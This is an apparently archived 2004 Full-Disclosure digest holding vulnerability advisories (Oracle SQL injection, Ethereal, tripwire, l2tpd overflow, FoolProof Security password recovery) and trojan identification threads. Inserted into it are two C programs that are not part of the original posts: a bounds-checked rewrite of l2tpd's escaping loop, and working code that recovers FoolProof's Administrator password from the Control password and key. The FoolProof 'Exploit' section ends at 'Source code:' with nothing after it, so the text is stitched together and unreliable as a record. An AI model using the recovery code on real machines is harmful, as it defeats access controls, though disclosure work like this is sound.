E-Business Suite - Multiple SQL Injection Vulnerabilities June 3, 2004 ______________________________________________________________________ Summary: Multiple SQL injection vulnerabilities exist in the Oracle E-Business Suite 11i and Oracle Applications 11.0. These vulnerabilities can be remotely exploited simply using a browser and sending a specially crafted URL to the web server. 
A mandatory patch from Oracle is required to solve these security issues.

Product:    Oracle E-Business Suite
Versions:   11.0.x, 11.5.1 - 11.5.8
Platforms:  All platforms
Risk Level: Critical
_____________________________________________________________________

Description:

Integrigy has discovered multiple SQL injection vulnerabilities in almost all supported versions of Oracle Applications (11.0 and 11i). Because Oracle Applications 11i installs code for all product modules, all Oracle Applications 11i customers are vulnerable to these SQL injection issues.

A SQL injection vulnerability allows an attacker to execute SQL statements or database functions by inserting SQL code fragments into input fields of a web page. Due to the design of Oracle Applications, a SQL injection attack can easily and effectively compromise the entire database and application.

Customers with Internet facing application servers are most vulnerable since these vulnerabilities can be exploited remotely using a browser. Since attacks can be specially crafted for Oracle Applications and an attack may only be a single HTTP Get or Post, successful attacks can be easily designed that will evade most intrusion detection and prevention systems.

Solution:

Oracle has released a patch for Oracle Applications 11.0 and the Oracle E-Business Suite 11i to correct these vulnerabilities. The following Oracle patches must be applied --

Version   Patch
-------   -----
11i       3644626 (11.5.1 - 11.5.8)
11.0      3648066 (all versions)

The patch availability matrix is available in Oracle Metalink Note ID 274375.1.

Oracle Applications 11i customers that have applied both the Report Manager Mini-pack B (11i.FRM.B) or greater AND Marketing Suite Family Pack B (11i.MKT_PF.B) do NOT need to apply a patch for these vulnerabilities - these patch levels are included in 11.5.9.

All Oracle Applications customers should consider this vulnerability extremely high risk and apply the above patch at the earliest possible opportunity.
Customers with Internet facing application servers should apply the patch immediately. Appropriate testing and backups should always be performed before applying any patches.

Additional Information:

http://www.integrigy.com/resources.htm
http://otn.oracle.com/deploy/security/pdf/2004alert67.pdf
Metalink Note ID 274356.1 (Oracle Security Alert)
Metalink Note ID 274375.1 (Patch Availability Matrix)

For more information or questions regarding this security alert, please contact us at alerts at integrigy.com.

Integrigy has included checks for these vulnerabilities in AppSentry, a vulnerability scanner for Oracle Applications, and AppDefend, an application intrusion prevention system for Oracle Applications.

Credit:

This vulnerability was discovered by Stephen Kost of Integrigy Corporation.
______________________________________________________________________

About Integrigy Corporation (www.integrigy.com)

Integrigy Corporation is a leader in application security for large enterprise, mission critical applications. Our application vulnerability assessment tool, AppSentry, assists companies in securing their largest and most important applications. Integrigy Consulting offers security assessment services for leading ERP and CRM applications. For more information, visit www.integrigy.com.

From derek at medien.akbild.ac.at Fri Jun 4 19:02:46 2004
From: derek at medien.akbild.ac.at (Derek)
Date: Fri, 04 Jun 2004 19:02:46 +0100
Subject: [Full-Disclosure] Out of Office
Message-ID:

I am out of office until 10th of June, please be patient with the email correspondence to catch up.
derek holzer

From debian-security-announce at lists.debian.org Fri Jun 4 19:13:25 2004
From: debian-security-announce at lists.debian.org (debian-security-announce at lists.debian.org)
Date: Fri, 4 Jun 2004 20:13:25 +0200 (CEST)
Subject: [Full-Disclosure] [SECURITY] [DSA 514-1] New Linux 2.2.20 packages fix local root exploit (sparc)
Message-ID:

An embedded and charset-unspecified text was scrubbed...
Name: not available
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040604/e1804639/attachment.ksh

From PerrymonJ at bek.com Fri Jun 4 20:11:26 2004
From: PerrymonJ at bek.com (Perrymon, Josh L.)
Date: Fri, 4 Jun 2004 14:11:26 -0500
Subject: [Full-Disclosure] another new worm submission
Message-ID: <5E1F351F4AE1D611A7FE00B0D0AB064A023532AB@is6b>

http://www.detroit-x.com/analysis.htm

This is something we found this morning. I have packet captures that I will post. I have attached the infected files found with FPORT and also registry entries.

We found this rebooting machines with the LSASS.exe error similar to Sasser. As of 6/4/2004 we found no virus defs to pick it up.

Joshua Perrymon
Sr. Network Security Consultant

PGP Fingerprint
51B8 01AC E58B 9BFE D57D 8EF6 C0B2 DECF EC20 6021

**********CONFIDENTIALITY NOTICE**********
The information contained in this e-mail may be proprietary and/or privileged and is intended for the sole use of the individual or organization named above. If you are not the intended recipient or an authorized representative of the intended recipient, any review, copying or distribution of this e-mail and its attachments, if any, is prohibited. If you have received this e-mail in error, please notify the sender immediately by return e-mail and delete this message from your system.
From aluigi at altervista.org Fri Jun 4 20:24:11 2004
From: aluigi at altervista.org (Luigi Auriemma)
Date: Fri, 4 Jun 2004 19:24:11 +0000
Subject: [Full-Disclosure] Colin McRae Rally 04 broadcast clients crash
Message-ID: <20040604192411.7ee71a81.aluigi@altervista.org>

#######################################################################

                             Luigi Auriemma

Application:  Colin McRae Rally 04
              http://www.codemasters.com/colinmcraerally04/
Versions:     1.0
Platforms:    Windows
Bug:          bad allocation (?)
Risk:         medium
Exploitation: remote, versus clients (broadcast)
Date:         04 June 2004
Author:       Luigi Auriemma
              e-mail: aluigi at altervista.org
              web:    http://aluigi.altervista.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

Colin McRae Rally 04 is the famous rally game developed by Codemasters and released at the beginning of April 2004.

#######################################################################

======
2) Bug
======

The bug is in a value that the servers send back to the clients when they enter the multiplayer menu. The bugged value is the number of players in the server ("numplayers"); if it is too high it causes the crash of the client.

Due to the location of the bug, any vulnerable client can't play online, because it automatically requests information from all the online servers, so a single malicious server can passively block the entire game network.

#######################################################################

===========
3) The Code
===========

http://aluigi.altervista.org/poc/cmr4cdos.zip

#######################################################################

======
4) Fix
======

No fix. Two months for a patch is not what I mean by "quick fix".
The bug was found just two days after the public release of the game and quickly reported to the developers, but no patch has been released yet.

#######################################################################

---
Luigi Auriemma
http://aluigi.altervista.org

From thomas-bugtraq at unproved.org Fri Jun 4 19:53:52 2004
From: thomas-bugtraq at unproved.org (Thomas Walpuski)
Date: Fri, 4 Jun 2004 18:53:52 +0000
Subject: [Full-Disclosure] bss-based buffer overflow in l2tpd
Message-ID: <20040604185352.GA4800@unproved.org>

All versions of l2tpd contain a bss-based buffer overflow. After circumventing some minor obstacles (i.e., faking a L2TP tunnel establishment) the overflow can be triggered by sending a specially crafted packet. The crucial code can be found in write_packet() in control.c:

  static unsigned char wbuf[MAX_RECV_SIZE];
  int pos = 0;

  [..]

  e = PPP_FLAG;
  wbuf[pos++] = e;
  for (x = 0; x < buf->len; x++)
  {
      e = *((char *) buf->start + x);
      if ((e < 0x20) || (e == PPP_ESCAPE) || (e == PPP_FLAG))
      {
          /* Escape this */
          e = e ^ 0x20;
          wbuf[pos++] = PPP_ESCAPE;
      }
      wbuf[pos++] = e;
  }
  wbuf[pos++] = PPP_FLAG;

Nota bene: buf->len can be up to 4080 = 4096 (=: MAX_RECV_SIZE) - 16.

It might be hard or even impossible to exploit this buffer overflow.
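The size arithmetic the post leaves implicit: every payload byte that meets the escape condition becomes two output bytes, so 4080 input bytes can need 2 + 2*4080 = 8162 bytes of wbuf, twice its 4096-byte capacity. The following is an added example, not code from l2tpd or from the post above; it computes that worst case and shows a bounded form of the same loop that refuses the frame instead of overrunning the buffer. PPP_FLAG (0x7e) and PPP_ESCAPE (0x7d) are the standard PPP/HDLC values and are assumed here; MAX_RECV_SIZE is 4096 as the post states.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_RECV_SIZE 4096   /* size of l2tpd's static wbuf, per the post */
#define PPP_FLAG      0x7e   /* PPP/HDLC frame delimiter (assumed standard value) */
#define PPP_ESCAPE    0x7d   /* PPP control escape (assumed standard value) */

/* True when a byte must be escaped, mirroring the condition in write_packet(). */
static int ppp_needs_escape(unsigned char e)
{
    return e < 0x20 || e == PPP_ESCAPE || e == PPP_FLAG;
}

/* Upper bound on output size for len payload bytes: opening flag, closing
 * flag, and two bytes per payload byte when every byte is escaped. */
size_t ppp_escaped_max(size_t len)
{
    return 2 + 2 * len;
}

/* Exact output size for one concrete payload. */
size_t ppp_escaped_len(const unsigned char *in, size_t len)
{
    size_t n = 2;
    for (size_t x = 0; x < len; x++)
        n += ppp_needs_escape(in[x]) ? 2 : 1;
    return n;
}

/* The same escaping loop as write_packet(), but it checks the worst case
 * against the destination size before writing a single byte.  Returns the
 * number of bytes written, or 0 if the frame cannot be guaranteed to fit. */
size_t ppp_escape_bounded(const unsigned char *in, size_t len,
                          unsigned char *out, size_t out_cap)
{
    size_t pos = 0;
    if (ppp_escaped_max(len) > out_cap)
        return 0;
    out[pos++] = PPP_FLAG;
    for (size_t x = 0; x < len; x++) {
        unsigned char e = in[x];
        if (ppp_needs_escape(e)) {
            out[pos++] = PPP_ESCAPE;
            e ^= 0x20;
        }
        out[pos++] = e;
    }
    out[pos++] = PPP_FLAG;
    return pos;
}

/* Constructed adversarial payload: the largest buf->len the post allows
 * (4080 bytes), every byte a flag character so each one gets escaped. */
size_t worst_case_bytes_needed(void)
{
    static unsigned char big[MAX_RECV_SIZE - 16];
    memset(big, PPP_FLAG, sizeof big);
    return ppp_escaped_len(big, sizeof big);      /* 8162 */
}

/* Does the bounded writer accept that payload into a MAX_RECV_SIZE buffer?
 * Returns 1 if it wrote the frame, 0 if it refused. */
int worst_case_accepted(void)
{
    static unsigned char big[MAX_RECV_SIZE - 16];
    static unsigned char out[MAX_RECV_SIZE];
    memset(big, PPP_FLAG, sizeof big);
    return ppp_escape_bounded(big, sizeof big, out, sizeof out) != 0;
}

/* Small constructed payload {0x7e, 0x7d, 0x01}: the expected frame is
 * 7e 7d 5e 7d 5d 7d 21 7e (8 bytes).  Returns 1 when the output matches. */
int small_case_matches(void)
{
    const unsigned char in[] = { PPP_FLAG, PPP_ESCAPE, 0x01 };
    const unsigned char want[] = { 0x7e, 0x7d, 0x5e, 0x7d, 0x5d, 0x7d, 0x21, 0x7e };
    unsigned char out[16];
    size_t n = ppp_escape_bounded(in, sizeof in, out, sizeof out);
    return n == sizeof want && memcmp(out, want, n) == 0;
}

int main(void)
{
    printf("worst case needs %zu bytes, wbuf holds %d\n",
           worst_case_bytes_needed(), MAX_RECV_SIZE);
    printf("bounded writer accepted worst case: %s\n",
           worst_case_accepted() ? "yes" : "no");
    printf("small frame correct: %s\n", small_case_matches() ? "yes" : "no");
    return 0;
}
```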
Thomas Walpuski

From koon at gentoo.org Fri Jun 4 20:30:59 2004
From: koon at gentoo.org (Thierry Carrez)
Date: Fri, 04 Jun 2004 21:30:59 +0200
Subject: [Full-Disclosure] [ GLSA 200406-01 ] Ethereal: Multiple security problems
Message-ID: <40C0CDF3.4080003@gentoo.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200406-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Ethereal: Multiple security problems
      Date: June 04, 2004
      Bugs: #51022
        ID: 200406-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities including one buffer overflow exist in Ethereal, which may allow an attacker to run arbitrary code or crash the program.

Background
==========

Ethereal is a feature rich network protocol analyzer.

Affected packages
=================

    -------------------------------------------------------------------
     Package                 /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  net-analyzer/ethereal       <= 0.10.3                   >= 0.10.4

Description
===========

There are multiple vulnerabilities in versions of Ethereal earlier than 0.10.4, including:

* A buffer overflow in the MMSE dissector.
* Under specific conditions a SIP packet could make Ethereal crash.
* The AIM dissector could throw an assertion, causing Ethereal to crash.
* The SPNEGO dissector could dereference a null pointer, causing a crash.

Impact
======

An attacker could use these vulnerabilities to crash Ethereal or even execute arbitrary code with the permissions of the user running Ethereal, which could be the root user.

Workaround
==========

For a temporary workaround you can disable all affected protocol dissectors by selecting Analyze->Enabled Protocols...
and deselecting them from the list. However, it is strongly recommended to upgrade to the latest stable release.

Resolution
==========

All Ethereal users should upgrade to the latest stable version:

    # emerge sync
    # emerge -pv ">=net-analyzer/ethereal-0.10.4"
    # emerge ">=net-analyzer/ethereal-0.10.4"

References
==========

  [ 1 ] Ethereal enpa-sa-00014
        http://www.ethereal.com/appnotes/enpa-sa-00014.html

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200406-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Technologies, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFAwM3zvcL1obalX08RAhWVAJ9e+BRSYi4AZA3Us7+0ib59Qyrk4gCcCdtJ
LqivdVf6W1IyR49JPaAOoMc=
=P4XV
-----END PGP SIGNATURE-----

From galt at locutus.isu.edu Fri Jun 4 20:57:16 2004
From: galt at locutus.isu.edu (John Galt)
Date: Fri, 4 Jun 2004 13:57:16 -0600 (MDT)
Subject: [Full-Disclosure] Out of Office
In-Reply-To:
References:
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

How much do you want to bet that he will be 0wned before then? ;P

On Fri, 4 Jun 2004, Derek wrote:

> I am out of office until 10th of June, please be patient
> with the email correspondence to catch up.
>
> derek holzer
>
- --
The Internet must be a medium for it is neither Rare nor Well done!

John Galt

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Made with pgp4pine 1.76

iD8DBQFAwNQm+TX+nYGFQPsRAuAcAJ9Aii7ETU/Rq9UwTHRaJW5cfLcFeACgpWOH
DaYREnElW6KGr8Uu98bz5Ys=
=kRgL
-----END PGP SIGNATURE-----

From api at epost.de Fri Jun 4 21:22:16 2004
From: api at epost.de (Axel Pettinger)
Date: Fri, 04 Jun 2004 22:22:16 +0200
Subject: [Full-Disclosure] another new worm submission
References: <5E1F351F4AE1D611A7FE00B0D0AB064A023532AB@is6b>
Message-ID: <40C0D9F8.2FD2E679@epost.de>

"Perrymon, Josh L." wrote:
>
> http://www.detroit-x.com/analysis.htm
>
> This is something we found this morning. I have packet captures that I
> will post.
> I have attached the infected files found with FPORT and also registry
> entries.
>
> We found this rebooting machines with the LSASS.exe error similar to
> Sasser. As of 6/4/2004 we found no virus defs to pick it up.

The malware (MD5: 2501c5d989229a6ab02146f7d2c1f6d8) is identified as ...

BitDefender : Backdoor.Dumador.AI
CA Vet      : Win32.Bambo.L trojan
DrWeb       : BackDoor.Dumaru
Eset        : Win32/Dumador.AI trojan
Kaspersky   : Backdoor.Dumador.ai
McAfee      : BackDoor-CCT
Symantec    : Backdoor.Nibu.G
Trend Micro : TROJ_DUMARIN.H

Description:
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DUMARIN.H&VSect=T

Regards,
Axel Pettinger

From insecure at ameritech.net Fri Jun 4 21:55:05 2004
From: insecure at ameritech.net (insecure)
Date: Fri, 04 Jun 2004 15:55:05 -0500
Subject: [Full-Disclosure] another new worm submission
In-Reply-To: <5E1F351F4AE1D611A7FE00B0D0AB064A023532AB@is6b>
References: <5E1F351F4AE1D611A7FE00B0D0AB064A023532AB@is6b>
Message-ID: <40C0E1A9.5080705@ameritech.net>

Perrymon, Josh L. wrote:

>http://www.detroit-x.com/analysis.htm
>
>This is something we found this morning. I have packet captures that I will
>post.
>I have attached the infected files found with FPORT and also registry
>entries.
>
>We found this rebooting machines with the LSASS.exe error similar to Sasser.
>As of 6/4/2004 we found no virus defs to pick it up.
>
>
>Joshua Perrymon
>Sr. Network Security Consultant
>
>
>
McAfee 7.1.0 with DAT 4364 (6/2/04) detects it as BackDoor-CCT. This is not a worm, it's a trojan. Your systems are being remotely compromised, possibly with an auto-rooter targeting the lsass vulnerability, which instructs the compromised system to download, install, and run this trojan. This trojan includes a keystroke logger, and additional components that you seem to have missed. Assume that system and any web site passwords have been compromised. Warn the users of these systems that unless they change any financial site passwords they are likely to be victims of theft.

How are these systems getting compromised? Why don't you have this patch deployed yet? Why are these systems reachable from the Internet over port 445?

You've got more problems than new worms.

From koon at gentoo.org Fri Jun 4 22:44:37 2004
From: koon at gentoo.org (Thierry Carrez)
Date: Fri, 04 Jun 2004 23:44:37 +0200
Subject: [Full-Disclosure] [ GLSA 200406-02 ] tripwire: Format string vulnerability
Message-ID: <40C0ED45.9080602@gentoo.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200406-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: tripwire: Format string vulnerability
      Date: June 04, 2004
      Bugs: #52945
        ID: 200406-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability allowing arbitrary code execution under certain circumstances has been found.
Background
==========

tripwire is an open source file integrity checker.

Affected packages
=================

    -------------------------------------------------------------------
     Package                 /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  app-admin/tripwire          <= 2.3.1.2                >= 2.3.1.2-r1

Description
===========

The code that generates email reports contains a format string vulnerability in pipedmailmessage.cpp.

Impact
======

With a carefully crafted filename on a local filesystem an attacker could cause execution of arbitrary code with permissions of the user running tripwire, which could be the root user.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All tripwire users should upgrade to the latest stable version:

    # emerge sync
    # emerge -pv ">=app-admin/tripwire-2.3.1.2-r1"
    # emerge ">=app-admin/tripwire-2.3.1.2-r1"

References
==========

  [ 1 ] Bugtraq Announcement
        http://www.securityfocus.com/archive/1/365036/2004-05-31/2004-06-06/0

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200406-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Technologies, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFAwO1FvcL1obalX08RAkrZAJ9Q7rq0lHme7mugx5gqNJsQA1+4fACgoByQ
1bQVhKo0jRXswMknBjPSVn4=
=t7dZ
-----END PGP SIGNATURE-----

From pauls at utdallas.edu Fri Jun 4 23:05:45 2004
From: pauls at utdallas.edu (Paul Schmehl)
Date: Fri, 04 Jun 2004 17:05:45 -0500
Subject: [Full-Disclosure] another new worm submission
In-Reply-To: <40C0E1A9.5080705@ameritech.net>
References: <5E1F351F4AE1D611A7FE00B0D0AB064A023532AB@is6b> <40C0E1A9.5080705@ameritech.net>
Message-ID: <47190000.1086386745@utd49554.utdallas.edu>

--On Friday, June 04, 2004 03:55:05 PM -0500 insecure wrote:

>
> McAfee 7.1.0 with DAT 4364 (6/2/04) detects it as BackDoor-CCT. This is
> not a worm, it's a trojan. Your systems are being remotely compromised,
> possibly with an auto-rooter targeting the lsass vulnerability, which
> instructs the compromised system to download, install, and run this
> trojan. This trojan includes a keystroke logger, and additional
> components that you seem to have missed. Assume that system and any web
> site passwords have been compromised. Warn the users of these systems
> that unless they change any financial site passwords they are likely to
> be victims of theft.
>
> How are these system getting compromised? Why don't you have this patch
> deployed yet? Why are these systems reachable from the Internet over port
> 445?
>
For someone who knows nothing about his network, you sure are willing to make a lot of assumptions. You admit you don't know how the systems were compromised and you don't know what compromised them, yet you castigate him for leaving port 445 open and not patching and you assume this happened *remotely*?

> You've got more problems than new worms.
>
One of which is miserable comforters.
Paul Schmehl (pauls at utdallas.edu)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/

From randallm at fidmail.com Sat Jun 5 00:30:23 2004
From: randallm at fidmail.com (RandallM)
Date: Fri, 4 Jun 2004 18:30:23 -0500
Subject: [Full-Disclosure] xabot or sdbot or spybot...
Message-ID: <200406042330.i54NUBv04878@netsys.com>

--__--__--

>Message: 21
>Date: Fri, 04 Jun 2004 00:08:23 +0200
>From: Axel Pettinger
>Organization: API
>To: "Perrymon, Josh L." , full-disclosure at netsys.com
>Subject: Re: [Full-Disclosure] anyone seen this worm/trojan before?

>"Perrymon, Josh L." wrote:
>>
>> I found this worm/ trojan on a laptop. Ran FPort and found the .exe.
>> Doesn't look like it propagates to other machines but rather communicates
>> with a compromised
>> web companies server using IRC. The compromised server has removed the IRC
>> service. Only sends RST packets back.
>>
>
>> I would like to know the attack vectors. I'm guessing LSASS.

>AntiVirus scanners identify our trojan as:

>BitDefender : Backdoor.SDBot.Gen
>Kaspersky   : Backdoor.Rbot.gen
>McAfee      : W32/Sdbot.worm.gen.g
>Symantec    : W32.Spybot.Worm
>Trend Micro : WORM_SPYBOT.AP

>From a quick look at the file I'd say the following is the best
>description of that trojan. There're several attack vectors ...

>http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_SPYBOT.AP&VSect=T

>Regards,
>Axel Pettinger

I'd like to throw something in here. While scanning with Spybot 1.3 it came to a halt with an error. The error was an "Xabot" error. After many attempts to figure this out I searched Xabot. This led to Symantec's site http://securityresponse.symantec.com/avcenter/venc/data/w32.xabot.worm.html and http://www.sophos.com/virusinfo/analyses/w32sdbotna.html where it is associated with Sdbot. Well, for sure I am having a hell of a time finding it as all conventional means have failed. 3 online scans. 3 scans in safe mode.
Hijack This, Swat-it, Bazooka and still Spybot is halted with the error. I uninstalled Spybot three times. It seems I have a remnant somewhere.

thank you
Randall M

From advisories at cyrillium.com Fri Jun 4 23:30:48 2004
From: advisories at cyrillium.com (advisories at cyrillium.com)
Date: Fri, 4 Jun 2004 18:30:48 -0400 (EDT)
Subject: [Full-Disclosure] [CYSA-0329] Password recovery vulnerability in FoolProof Security 3.9.x for Windows 95/9
Message-ID: <200406042230.i54MUmv20169@netsys.com>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Cyrillium Security Advisory CYSA-0329
advisories at cyrillium.com
http://www.cyrillium.com/
Cyrillium Security Solutions and Services
April 29th, 2004
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Severity: High (Password Compromise)

Vendor: SmartStuff Software (member of Riverdeep Interactive Learning, Inc.)

Affected Products: FoolProof Security 3.9.x for Windows 98/98SE/Me

Unaffected Products: FoolProof Security for Macintosh
                     FoolProof Security for Windows XP and Windows 2000

1. Problem Description

Cyrillium Security Solutions and Services has discovered a vulnerability in the password recovery feature of FoolProof Security that allows an attacker to recover the "Administrator" password using the "Control" password and password recovery key. FoolProof for Macintosh and FoolProof for Windows XP & 2000 are not affected because they do not support the password recovery feature.

2. Details

Passwords are stored as 16-byte, zero-padded ASCII strings. When FoolProof Security is installed, an "Administrator" password must be specified. Either the "Administrator" password or the "Control" password may be used to access the FoolProof control panel and to bypass the Bootlock and Keylock protection features.
If the "Control" password is forgotten or compromised, the "Administrator" password can be used either to enter the FoolProof control panel and change the "Control" password, or to determine the "Control" password from the password recovery key. The password recovery key is a 32-character hexadecimal string that can be obtained by holding down the Shift key and pressing "OK" in the FoolProof control panel's initial password dialog box. The ADMINPW.EXE program on the FoolProof Security installation diskette calculates the "Control" password from the "Administrator" password and the password recovery key.

The ADMINPW.EXE program combines the zero-padded "Administrator" password with the password recovery key using the bitwise exclusive OR (XOR) operation. Next, the ASCII string "D:SKFOIJ@(*EHJFL" is subtracted from the previous result (one byte at a time). The final result is the "Control" password.

If C represents the "Control" password, A represents the "Administrator" password, B represents the ASCII string "D:SKFOIJ@(*EHJFL", and K represents the password recovery key, then manipulating the formula:

  C = (A xor K) - B

yields:

  A = (C + B) xor K

Thus, the "Administrator" password can be calculated if the "Control" password and password recovery key are known. The password recovery key is trivial to obtain by holding down the Shift key and pressing "OK" in the FoolProof control panel's initial password dialog box. If the "Control" password is compromised, the "Administrator" password can be compromised as well.
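The relation above worked through in code, as an added example that is not part of this advisory and not ADMINPW.EXE itself: the forward step and its inverse are each a byte-wise bijection, so once K is displayed on demand, knowing C is the same as knowing A. The function names and the hex decoder are this example's own; B, the vectors and the zero-padding rule are the advisory's.

```c
#include <stdio.h>
#include <string.h>

#define FP_PWLEN 16

/* B from the advisory: the constant ADMINPW.EXE subtracts byte by byte. */
static const unsigned char FP_OFFSETS[FP_PWLEN + 1] = "D:SKFOIJ@(*EHJFL";

/* Zero-pad a password into the 16-byte block FoolProof stores. */
static void fp_pad(const char *pw, unsigned char out[FP_PWLEN])
{
    size_t n = strlen(pw);
    if (n > FP_PWLEN)
        n = FP_PWLEN;
    memset(out, 0, FP_PWLEN);
    memcpy(out, pw, n);
}

static int fp_nibble(char ch)
{
    if (ch >= '0' && ch <= '9') return ch - '0';
    if (ch >= 'a' && ch <= 'f') return ch - 'a' + 10;
    if (ch >= 'A' && ch <= 'F') return ch - 'A' + 10;
    return -1;
}

/* Decode the 32-character hex recovery key K into 16 bytes.
 * Returns 0 on success, -1 on wrong length or a non-hex character. */
int fp_hex_decode(const char *hex, unsigned char out[FP_PWLEN])
{
    if (strlen(hex) != 2 * FP_PWLEN)
        return -1;
    for (int i = 0; i < FP_PWLEN; i++) {
        int hi = fp_nibble(hex[2 * i]), lo = fp_nibble(hex[2 * i + 1]);
        if (hi < 0 || lo < 0)
            return -1;
        out[i] = (unsigned char)(hi << 4 | lo);
    }
    return 0;
}

/* Forward direction, what ADMINPW.EXE computes: C = (A xor K) - B.
 * Arithmetic is per byte, so the subtraction wraps modulo 256. */
void fp_derive_control(const unsigned char a[FP_PWLEN],
                       const unsigned char k[FP_PWLEN],
                       unsigned char c[FP_PWLEN])
{
    for (int i = 0; i < FP_PWLEN; i++)
        c[i] = (unsigned char)((a[i] ^ k[i]) - FP_OFFSETS[i]);
}

/* Inverse from the advisory: A = (C + B) xor K.  Adding B undoes the
 * subtraction and XORing K again undoes the mask, byte for byte. */
void fp_recover_admin(const unsigned char c[FP_PWLEN],
                      const unsigned char k[FP_PWLEN],
                      unsigned char a[FP_PWLEN])
{
    for (int i = 0; i < FP_PWLEN; i++)
        a[i] = (unsigned char)((unsigned char)(c[i] + FP_OFFSETS[i]) ^ k[i]);
}

/* Round trip for any admin password and key: derive C, recover A, compare.
 * Returns 1 when the inverse reproduces the padded input, 0 otherwise
 * (including when the key is not valid hex). */
int fp_roundtrip_holds(const char *admin, const char *hexkey)
{
    unsigned char a[FP_PWLEN], k[FP_PWLEN], c[FP_PWLEN], back[FP_PWLEN];
    if (fp_hex_decode(hexkey, k) != 0)
        return 0;
    fp_pad(admin, a);
    fp_derive_control(a, k, c);
    fp_recover_admin(c, k, back);
    return memcmp(a, back, FP_PWLEN) == 0;
}

/* The advisory's own vectors: A = "12345", K = BDAD8C83..., C must come
 * out as "HelloWorld" and the inverse must give "12345" back. */
int fp_advisory_example_holds(void)
{
    unsigned char a[FP_PWLEN], k[FP_PWLEN], c[FP_PWLEN], want[FP_PWLEN], back[FP_PWLEN];
    if (fp_hex_decode("BDAD8C8380A6B8BCAC8C2A45484A464C", k) != 0)
        return 0;
    fp_pad("12345", a);
    fp_pad("HelloWorld", want);
    fp_derive_control(a, k, c);
    if (memcmp(c, want, FP_PWLEN) != 0)
        return 0;
    fp_recover_admin(c, k, back);
    return memcmp(back, a, FP_PWLEN) == 0;
}

int main(void)
{
    printf("advisory example reproduces: %s\n",
           fp_advisory_example_holds() ? "yes" : "no");
    printf("round trip for a constructed key: %s\n",
           fp_roundtrip_holds("s3cret", "00112233445566778899AABBCCDDEEFF") ? "yes" : "no");
    return 0;
}
```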
Example:

Administrator password is "12345":
  A = 31 32 33 34 35 00 00 00 00 00 00 00 00 00 00 00 (hexadecimal)

Control password is "HelloWorld":
  C = 48 65 6C 6C 6F 57 6F 72 6C 64 00 00 00 00 00 00

Recovery key (reported by FoolProof control panel):
  K = BD AD 8C 83 80 A6 B8 BC AC 8C 2A 45 48 4A 46 4C

Offsets (constant):
  B = 44 3A 53 4B 46 4F 49 4A 40 28 2A 45 48 4A 46 4C

Recovery process (ADMINPW.EXE algorithm):
  A xor K       = 8C 9F BF B7 B5 A6 B8 BC AC 8C 2A 45 48 4A 46 4C
  (A xor K) - B = 48 65 6C 6C 6F 57 6F 72 6C 64 00 00 00 00 00 00
  (A xor K) - B = "HelloWorld" = Control password

Reverse recovery process:
  C + B         = 8C 9F BF B7 B5 A6 B8 BC AC 8C 2A 45 48 4A 46 4C
  (C + B) xor K = 31 32 33 34 35 00 00 00 00 00 00 00 00 00 00 00
  (C + B) xor K = "12345" = Administrator password

The "Administrator" password can be successfully determined knowing only the "Control" password and the password recovery key.

4. Exploit

The following program calculates the "Administrator" password from the password recovery key and the "Control" password.

Usage:

Invoke the program with the following arguments:

  foolpw HEXADECIMAL_RECOVERY_KEY CONTROL_PASSWORD

Example:

  C:\> foolpw BDAD8C8380A6B8BCAC8C2A45484A464C HelloWorld
  12345

Source code:

